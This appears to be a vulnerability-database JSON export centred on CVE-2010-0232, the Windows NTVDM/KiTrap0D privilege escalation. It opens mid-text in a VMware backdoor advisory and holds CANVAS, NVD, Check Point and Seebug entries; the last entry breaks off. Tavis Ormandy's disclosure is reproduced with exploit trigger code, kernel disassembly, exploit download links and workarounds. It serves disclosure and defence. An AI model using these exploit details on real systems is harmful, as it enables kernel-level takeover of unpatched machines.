ROM\r\non affected versions of Windows, thereby preventing exploitation of\r\nthe vulnerability. To disable NTVDM, follow the guidance presented in\r\none of the following Microsoft Knowledge Base Articles:\r\n\r\n http://support.microsoft.com/kb/979682\r\n http://support.microsoft.com/kb/220159\r\n\r\nOr, manually set the "VDMDisallowed" registry value, which is\r\nmentioned on the following page: (Note that this registry value is\r\nnot recognized by all versions of Windows.)\r\n\r\n http://technet.microsoft.com/en-us/library/cc783069.aspx\r\n\r\nBe aware that disabling NTVDM will break 32-bit applications that rely\r\non DOS functionality, in addition to 16-bit applications.\r\n\r\n* Run untrusted programs in a Remote Desktop session, and do not allow\r\nthe guest to power down or restart\r\n\r\nThe most likely exploitation scenarios require that the attack code be\r\nable to trigger a kernel BIOS call, which is most easily accomplished\r\nby changing the guest's video mode. Running suspect code in a Remote\r\nDesktop session--as opposed to a console session--prevents the code\r\nfrom changing the video mode, thereby reducing the likelihood of\r\nsuccessful elevation to kernel privileges. (Of course, make sure that\r\ndangerous Remote Desktop features, such as local drive sharing, are\r\ndisabled when running untrusted code in this way.)\r\n\r\nAnother feasible exploitation scenario involves overwriting the BIOS\r\nand then causing a shutdown, a restart, or hibernation. Run untrusted\r\ncode in the guest as an unprivileged user without shutdown privileges,\r\nand force the virtual machine to power down afterwards; do not allow\r\nthe guest to gracefully power down or restart, as that might give\r\nmodified code an opportunity to execute.\r\n\r\nBecause this workaround does not prevent modification of BIOS ROM,\r\nmalicious code could still attempt to exploit the vulnerability by\r\ncausing a blue-screen or planting code for other users' VDMs to\r\nexecute.\r\n\r\n* Disable the "info-get" and "info-set" commands\r\n\r\nExploitation depends on the attacker being able to overwrite ROM with\r\nthe contents of backdoor command responses, which the "info-set" and\r\n"info-get" commands facilitate by allowing the attacker to store and\r\nretrieve arbitrary data. These commands can be disabled in a specific\r\nguest by adding the following lines to the virtual machine's .vmx\r\nconfiguration file:\r\n\r\n isolation.tools.getInfo.disable = "TRUE"\r\n isolation.tools.setInfo.disable = "TRUE"\r\n\r\nNote that the second line also disables the "SetGuestInfo" command.\r\nIt is not known if disabling these commands disrupts any guest\r\nmonitoring or other VMware Tools functionality.\r\n\r\n* Restrict access to the VMware backdoor interface\r\n\r\nAdding the following line to the virtual machine's .vmx configuration\r\nfile will prevent unprivileged code (code with CPL > IOPL) from\r\naccessing the VMware backdoor interface, rendering the vulnerability\r\nunexploitable for the sake of privilege elevation:\r\n\r\n monitor_control.restrict_backdoor = "TRUE"\r\n\r\nWith this setting in place, an unprivileged attempt to execute a\r\nVMware backdoor port I/O instruction will result in a privileged\r\ninstruction exception. Note that this setting crashes the user-mode\r\nportion of VMware Tools, and thus disrupts certain features such as\r\nguest-host copy-and-paste and drag-and-drop.\r\n\r\n\r\nCONCLUSION\r\n----------\r\nThis document discloses a guest privilege elevation vulnerability\r\narising from fairly arcane behavior of VMware's backdoor interface,\r\nand makes a case for its exploitability by presenting at a high level\r\nthe steps performed by the author's own functioning proof of concept.\r\n\r\nIt is not known if other machine virtualization software is\r\nsusceptible to similar issues regarding incomplete emulation of\r\nread-only memory.\r\n\r\n\r\nGREETINGS\r\n---------\r\nwww.ridgewayis.com\r\nwww.ftmband.com\r\n", "edition": 1, "cvss3": {}, "published": "2012-04-02T00:00:00", "title": "VMware High-Bandwidth Backdoor ROM Overwrite Privilege Elevation", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-0232", "CVE-2007-1206", "CVE-2012-1515"], "modified": "2012-04-02T00:00:00", "id": "SECURITYVULNS:DOC:27844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27844", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:19", "edition": 3, "description": "**Name**| ms_ntvdm \n---|--- \n**CVE**| CVE-2010-0232 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| NtVdmControl()->KiTrap0d local \n**Notes**| CVE Name: CVE-2010-0232 \nVENDOR: Microsoft \nNotes: \nThis exploit gets you LOCAL/SYSTEM on vulnerable versions of Windows (which is essentially all of them). \nIt needs a writable directory to upload its payload (%TEMP% works usually) and \nit will automatically chdir into %TEMP% if it can't upload a file to the current \nworking directory. \n \nThis exploit will set up a listener on the remote Node's 127.0.0.1. \n \n \nRepeatability: One Shot \nMSRC: MS10-015 \nDate public: 01/19/2010 \n\n", "cvss3": {}, "published": "2010-01-21T19:30:00", "type": "canvas", "title": "Immunity Canvas: MS_NTVDM", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-21T19:30:00", "id": "MS_NTVDM", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms_ntvdm", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T11:32:16", "description": "The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka \"Windows Kernel Exception Handler Vulnerability.\"", "cvss3": {}, "published": "2010-01-21T19:30:00", "type": "cve", "title": "CVE-2010-0232", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2019-02-26T14:04:00", "cpe": ["cpe:/o:microsoft:windows_2000:sp4", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:sp2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_nt:3.1", "cpe:/o:microsoft:windows_vista:sp1", "cpe:/o:microsoft:windows_xp:sp3", "cpe:/o:microsoft:windows_vista:sp2", "cpe:/o:microsoft:windows_server_2008:-"], "id": "CVE-2010-0232", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0232", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:x32:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:sp4:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:sp3:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:sp2:x32:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_nt:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:*:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:sp2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:*:x64:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2021-11-04T20:12:03", "description": "An elevation of privilege vulnerability exists in the Windows Kernel due to the way the kernel handles certain exceptions. The Windows Kernel is the core of the operating system, providing system level services such as device management and memory management. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.", "cvss3": {}, "published": "2010-02-12T00:00:00", "type": "checkpoint_advisories", "title": "Update Protection against Windows Kernel Exception Handler Vulnerability (MS10-015)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-01T00:00:00", "id": "CPAI-2010-104", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:38:29", "description": "An elevation of privilege vulnerability exists in the Windows Kernel due to the way the kernel handles certain exceptions. The Windows Kernel is the core of the operating system. It provides system level services such as device management and memory management, allocates processor time to processes, and manages error handling. An attacker may exploit this vulnerability via a specially crafted application. The vulnerability is due to a design weakness in the Windows kernel when handling certain exceptions. A remote attacker could trigger this flaw by using a specially crafted 16-bit program in the affected system. Successfully exploitation of this vulnerability could allow the attacker to take complete control of an affected system. There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS.", "cvss3": {}, "published": "2010-02-28T00:00:00", "type": "checkpoint_advisories", "title": "Portable Executable (PE) 16-bit File (CVE-2010-0232; CVE-2011-2003)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232", "CVE-2011-2003"], "modified": "2010-03-01T00:00:00", "id": "SBP-2010-11", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:15:47", "description": "BUGTRAQ ID: 37864\r\nCVE ID: CVE-2010-0232\r\n\r\nMicrosoft Windows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows\u7684\u5185\u6838#GP\u9677\u4e95\u5904\u7406\u4f8b\u7a0b\u5bf9\u6267\u884c\u7684\u73af\u5883\u505a\u4e86\u4e00\u4e9b\u4e0d\u6b63\u786e\u7684\u5047\u8bbe\uff0c\u672c\u5730\u666e\u901a\u7528\u6237\u6743\u9650\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4f2a\u9020\u6267\u884c\u73af\u5883\u4e2d\u7684\u6570\u636e\u4f7f\u64cd\u4f5c\u7cfb\u7edf\u5728ring0\u5c42\u6267\u884c\u6307\u5b9a\u7684\u4efb\u610f\u6307\u4ee4\uff0c\u4ece\u800c\u53d6\u5f97\u5bf9\u7cfb\u7edf\u7684\u5b8c\u5168\u63a7\u5236\u3002\u6b64\u6f0f\u6d1e\u5f71\u54cd\u51e0\u4e4e\u6240\u6709\u7684x86 32\u4f4d\u7684Windows\u7cfb\u7edf\u3002\r\n\r\n\u4e3a\u4e86\u5728\u8001\u5f0f\u768416\u4f4d\u5e94\u7528\u4e2d\u652f\u6301BIOS\u670d\u52a1\u4f8b\u7a0b\uff0cWindows NT\u5185\u6838\u652f\u6301Virtual-8086\u6a21\u5f0f\u76d1\u63a7\u4ee3\u7801\u4e2d\u7684BIOS\u8c03\u7528\uff0c\u5206\u4e24\u4e2a\u9636\u6bb5\u5b9e\u73b0\u3002\u5f53#GP\u9677\u9631\u5904\u7406\u5668\uff08nt!KiTrap0D\uff09\u68c0\u6d4b\u5230\u51fa\u9519\u7684 cs:eip\u5339\u914d\u4e86\u7279\u5b9a\u7684magic value\uff0c\u5185\u6838\u5c31\u4f1a\u8fc7\u6e21\u5230\u7b2c\u4e8c\u9636\u6bb5\u3002\u4e00\u65e6\u786e\u8ba4\u4e86\u771f\u5b9e\u6027\uff0c\u8fc7\u6e21\u5230\u7b2c\u4e8c\u9636\u6bb5\u5c31\u4f1a\u6d89\u53ca\u5230\u4ece\u51fa\u9519\u7684\u9677\u9631\u5e27\u6062\u590d\u4e4b\u524d\u6240\u4fdd\u5b58\u7684\u6267\u884c\u4e0a\u4e0b\u6587\u548c\u8c03\u7528\u6808\u3002\r\n\r\n\u7531\u4e8e\u8fd9\u4e2a\u9a8c\u8bc1\u4f9d\u8d56\u4e8e\u4ee5\u4e0b\u9519\u8bef\u7684\u5047\u8bbe\uff1a\r\n\r\n - \u521b\u5efaVDM\u4e0a\u4e0b\u6587\u9700\u8981SeTcbPrivilege\r\n - ring3\u4ee3\u7801\u65e0\u6cd5\u5b89\u88c5\u4efb\u610f\u4ee3\u7801\u6bb5\u9009\u62e9\u5668\r\n - ring3\u4ee3\u7801\u65e0\u6cd5\u4f2a\u9020\u9677\u9631\u5e27\r\n\r\n\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u521b\u5efa\u4f2a\u9020\u7684VDM\u4e0a\u4e0b\u6587\uff0c\u7136\u540e\u901a\u8fc7\u89e6\u53d1\u5f02\u5e38\u5bfc\u81f4\u5185\u6838\u6808\u8fd4\u56de\u5230\u53d7\u63a7\u7684\u5730\u5740\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u5185\u6838\u6001\u4ee3\u7801\u3002\n\nMicrosoft Windows XP SP3\r\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Vista SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista\r\nMicrosoft Windows Server 2008 SP2\r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows 7\r\nMicrosoft Windows 2000SP4\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cNSFOCUS\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u7981\u7528NTVDM\u5b50\u7cfb\u7edf\u3002\r\n\r\n 1. \u8fd0\u884c gpedit.msc \u7a0b\u5e8f\r\n 2. \u5c55\u5f00\u201c\u7ba1\u7406\u6a21\u677f\u201d\uff0c\u9009\u62e9\u201cWindows\u7ec4\u4ef6\u201d\r\n 3. \u70b9\u51fb\u201c\u5e94\u7528\u7a0b\u5e8f\u517c\u5bb9\u6027\u201d\r\n 4. \u5728\u53f3\u8fb9\u7684\u6761\u76ee\u663e\u793a\u6846\u5185\u53cc\u51fb\u201c\u9632\u6b62\u8bbf\u95ee16\u4f4d\u5e94\u7528\u7a0b\u5e8f\u201d\r\n 5. \u8bbe\u7f6e\u6807\u7b7e\u9875\u4e2d\u9009\u62e9\u201c\u5df2\u542f\u7528\u201d\r\n 6. \u70b9\u51fb\u201c\u786e\u5b9a\u201d\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.microsoft.com/technet/security/advisory/979682.mspx", "cvss3": {}, "published": "2010-01-22T00:00:00", "title": "Microsoft Windows #GP\u9677\u9631\u5904\u7406\u5668\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2010-01-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18977", "id": "SSV:18977", "sourceData": "\n http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18977", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:43:09", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Windows NT - User Mode to Ring 0 Escalation Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67537", "id": "SSV:67537", "sourceData": "\n Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack\r\n-------------------------------------------------------------------------\r\n\r\nCVE-2010-0232\r\n\r\nIn order to support BIOS service routines in legacy 16bit applications, the\r\nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode\r\nmonitor code. These are implemented in two stages, the kernel transitions to\r\nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the\r\nfaulting cs:eip matches specific magic values.\r\n\r\nTransitioning to the second stage involves restoring execution context and\r\ncall stack (which had been previously saved) from the faulting trap frame once\r\nauthenticity has been verified.\r\n\r\nThis verification relies on the following incorrect assumptions:\r\n\r\n - Setting up a VDM context requires SeTcbPrivilege.\r\n - ring3 code cannot install arbitrary code segment selectors.\r\n - ring3 code cannot forge a trap frame.\r\n\r\nThis is believed to affect every release of the Windows NT kernel, from\r\nWindows NT 3.1 (1993) up to and including Windows 7 (2009).\r\n\r\nWorking out the details of the attack is left as an exercise for the reader.\r\n\r\nJust kidding, that was an homage to Derek Soeder :-)\r\n\r\n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.\r\n\r\nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order\r\nto access the authenticated system service, NtVdmControl(). VdmAllowed can\r\nonly be set using NtSetInformationProcess(), which verifies the caller has\r\nSeTcbPrivilege. If this is true, the caller is very privileged and can\r\ncertainly be trusted.\r\n\r\nThis restriction can be subverted by requesting the NTVDM subsystem, and then\r\nusing CreateRemoteThread() to execute in the context of the subsystem process,\r\nwhich will already have this flag set.\r\n\r\n- Assumption 1: ring3 code cannot install arbitrary code segment selectors.\r\n\r\nCpl is usually equal to the two least significant bits of cs and ss, and is\r\na simple way to calculate the privilege of a task. However, there is an\r\nexception, Virtual-8086 mode.\r\n\r\nReal mode uses a segmented addressing scheme in order to allow 16-bit\r\naddresses to access the 20-bit address space. This is achieved by forming\r\nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The\r\nsame calculation is used to map the segmented real address space onto the\r\nprotected linear address space in Virtual-8086 mode. Therefore, I must be\r\npermitted to set cs to any value, and checks for disallowed or privileged\r\nselectors can be bypassed (PsSetLdtEnties will reject any selector where any\r\nof the three lower bits are unset, as is the case with the required cs pair).\r\n\r\n- Assumption 2: ring3 code cannot forge a trap frame.\r\n\r\nReturning to usermode with iret is a complicated operation, the pseudocode for\r\nthe iret instruction alone spans several pages of Intel's Software Developers\r\nManual. The operation occurs in two stages, a pre-commit stage and a\r\npost-commit stage. Using the VdmContext installed using NtVdmControl(), an\r\ninvalid context can be created that causes iret to fail pre-commit, thus\r\nforging a trap frame.\r\n\r\nThe final requirement involves predicting the address of the second-stage BIOS\r\ncall handler. The address is static in Windows 2003, XP and earlier operating\r\nsystems, however, Microsoft introduced kernel base randomisation in Windows\r\nVista. Unfortunately, this potentially useful exploit mitigation is trivial\r\nto defeat locally as unprivileged users can simply query the loaded module list\r\nvia NtQuerySystemInformation().\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to\r\nbe affected, including but not limited to the following actively supported\r\nversions:\r\n\r\n - Windows 2000\r\n - Windows XP\r\n - Windows Server 2003\r\n - Windows Vista\r\n - Windows Server 2008\r\n - Windows 7\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nUpon successful exploitation, the kernel stack is switched to an attacker\r\nspecified address.\r\n\r\nAn attacker would trigger the vulnerability by setting up a specially\r\nformed VDM_TIB in their TEB, using a code sequence like this:\r\n\r\n/* ... */\r\n // Magic CS required for exploitation\r\n Tib.VdmContext.SegCs = 0x0B;\r\n // Pointer to fake kernel stack\r\n Tib.VdmContext.Esi = &KernelStack;\r\n // Magic IP required for exploitation\r\n Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;\r\n\r\n NtCurrentTeb()->Reserved4[0] = &Tib;\r\n/* ... */\r\n\r\nFollowed by\r\n\r\n/* ... */\r\n NtVdmControl(VdmStartExecution, NULL);\r\n/* ... */\r\n\r\nWhich will reach the following code sequence via the #GP trap handler,\r\nnt!KiTrap0D. Please note how the stack pointer is restored from the saved\r\n(untrusted) trap frame at 43C3E6, undoubtedly resulting in the condition\r\ndescribed above.\r\n\r\n/* ... */\r\n.text:0043C3CE Ki386BiosCallReturnAddress proc near\r\n.text:0043C3CE mov eax, large fs:KPCR.SelfPcr\r\n.text:0043C3D4 mov edi, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3D7 mov edi, [edi]\r\n.text:0043C3D9 mov esi, [eax+KPCR.NtTib.StackBase]\r\n.text:0043C3DC mov ecx, 84h\r\n.text:0043C3E1 mov [eax+KPCR.NtTib.StackBase], edi\r\n.text:0043C3E4 rep movsd\r\n.text:0043C3E6 mov esp, [ebp+KTRAP_FRAME.Esi]\r\n.text:0043C3E9 add esp, 4\r\n.text:0043C3EC mov ecx, [eax+KPCR.PrcbData.CurrentThread]\r\n.text:0043C3F2 mov [ecx+KTHREAD.InitialStack], edi\r\n.text:0043C3F5 mov eax, [eax+KPCR.TSS]\r\n.text:0043C3F8 sub edi, 220h\r\n.text:0043C3FE mov [eax+KTSS.Esp0], edi\r\n.text:0043C401 pop edx\r\n.text:0043C402 mov [ecx+KTHREAD.Teb], edx\r\n.text:0043C405 pop edx\r\n.text:0043C406 mov large fs:KPCR.NtTib.Self, edx\r\n.text:0043C40D mov ebx, large fs:KPCR.GDT\r\n.text:0043C414 mov [ebx+3Ah], dx\r\n.text:0043C418 shr edx, 10h\r\n.text:0043C41B mov byte ptr [ebx+3Ch], dl\r\n.text:0043C41E mov [ebx+3Fh], dh\r\n.text:0043C421 sti\r\n.text:0043C422 pop edi\r\n.text:0043C423 pop esi\r\n.text:0043C424 pop ebx\r\n.text:0043C425 pop ebp\r\n.text:0043C426 retn 4\r\n/* ... */\r\n\r\nPossibly naive example code for triggering this condition is availble from the\r\nlink below.\r\n\r\nhttp://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip\r\nExploit-DB Mirror: http://www.exploit-db.com/sploits/KiTrap0D.zip\r\n\r\nThe code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista\r\nand Windows 7. Support for other affected operating systems is left as an\r\nexercise for the interested reader.\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIf you believe you may be affected, you should consider applying the workaround\r\ndescribed below.\r\n\r\nTemporarily disabling the MSDOS and WOWEXEC subsystems will prevent the attack\r\nfrom functioning, as without a process with VdmAllowed, it is not possible to\r\naccess NtVdmControl() (without SeTcbPrivilege, of course).\r\n\r\nThe policy template "Windows Components\\Application Compatibility\\Prevent\r\naccess to 16-bit applications" may be used within the group policy editor to\r\nprevent unprivileged users from executing 16-bit applications. I'm informed\r\nthis is an officially supported machine configuration.\r\n\r\nAdministrators unfamiliar with group policy may find the videos below\r\ninstructive. Further information is available from the Windows Server\r\nGroup Policy Home\r\n\r\nhttp://technet.microsoft.com/en-us/windowsserver/grouppolicy/default.aspx.\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2003\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=XRVI4iQ2Nug\r\n\r\nTo watch a demonstration of this policy being applied to a Windows Server 2008\r\ndomain controller, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u8pfXW7crEQ\r\n\r\nTo watch a demonstration of this policy being applied to a shared but\r\nunjoined Windows XP Professional machine, see the link below.\r\n\r\nhttp://www.youtube.com/watch?v=u7Y6d-BVwxk\r\n\r\nOn Windows NT4, the following knowledgebase article explains how to disable the\r\nNTVDM and WOWEXEC subsystems.\r\n\r\nhttp://support.microsoft.com/kb/220159\r\n\r\nApplying these configuration changes will temporarily prevent users from\r\naccessing legacy 16-bit MS-DOS and Windows 3.1 applications, however, few users\r\nrequire this functionality.\r\n\r\nIf you do not require this feature and depend on NT security, consider\r\npermanently disabling it in order to reduce kernel attack surface.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMicrosoft was informed about this vulnerability on 12-Jun-2009, and they\r\nconfirmed receipt of my report on 22-Jun-2009.\r\n\r\nRegrettably, no official patch is currently available. As an effective and easy\r\nto deploy workaround is available, I have concluded that it is in the best\r\ninterest of users to go ahead with the publication of this document without an\r\nofficial patch. It should be noted that very few users rely on NT security, the\r\nprimary audience of this advisory is expected to be domain administrators and\r\nsecurity professionals.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,\r\nScaryBeasts, spender and all my other elite colleagues.\r\n\r\nCheck out some photography while at ring0 http://flickr.com/meder.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\nDerek Soeder has previously reported some legendary NT bugs, including multiple\r\nvdm bugs that, while unrelated to this issue, make fascinating reading.\r\n\r\n- http://seclists.org/fulldisclosure/2004/Oct/404, Windows VDM #UD LocalPrivilege Escalation\r\n- http://seclists.org/fulldisclosure/2004/Apr/477, Windows VDM TIB Local Privilege Escalation\r\n- http://seclists.org/fulldisclosure/2007/Apr/357, Zero Page Race Condition Privilege Escalation\r\n\r\n-------------------\r\nAppendix\r\n-----------------------\r\n\r\nSHA-1 checksum of KiTrap0D.zip follows.\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n99a047427e9085d52aaddfc9214fd1a621534072 KiTrap0D.zip\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBS1W6+RvyfE4zaHEXAQK//QgAvo/VhPdeASGe7SSfC3jLwNzsfVfM+FMo\r\nx7JZMMfVUh6b/+FxvokIpsCUf7QQkv+YcyCiatutVjUok5aw5BirFtPLHORIIKPX\r\nB5gN2a4G8RIXh5yKE6FffKGQsPJNW1Ua5Jss8rf59TEj3EDky1vco+WVmmz7TsHn\r\nTQdUreVcL8wFmCAgq5X0AKrdepYDBmYLF0AUFOdG3mKJ43dnP59p9R7+ckv0pfLW\r\nXtvOgzZDNMew4z2Z53YQpE7dO+Y3H3rnhLN7jF7i9We9iiG4ATDke8byFAIDZQZx\r\nucq5EOcRsfAAWW3O8EbzQa0NiHHScJrKDjvg0gX1Y69MBBwCLNP6yg==\r\n=LHU0\r\n-----END PGP SIGNATURE-----\r\n\r\n-- \r\n-------------------------------------\r\ntavisosdf.lonestar.org | finger me for my gpg key.\r\n------------------------------------------------------- \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67537", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:25:17", "description": "BUGTRAQ ID: 38044 \r\nCVE(CAN) ID: CVE-2010-0233\r\n\r\nMicrosoft 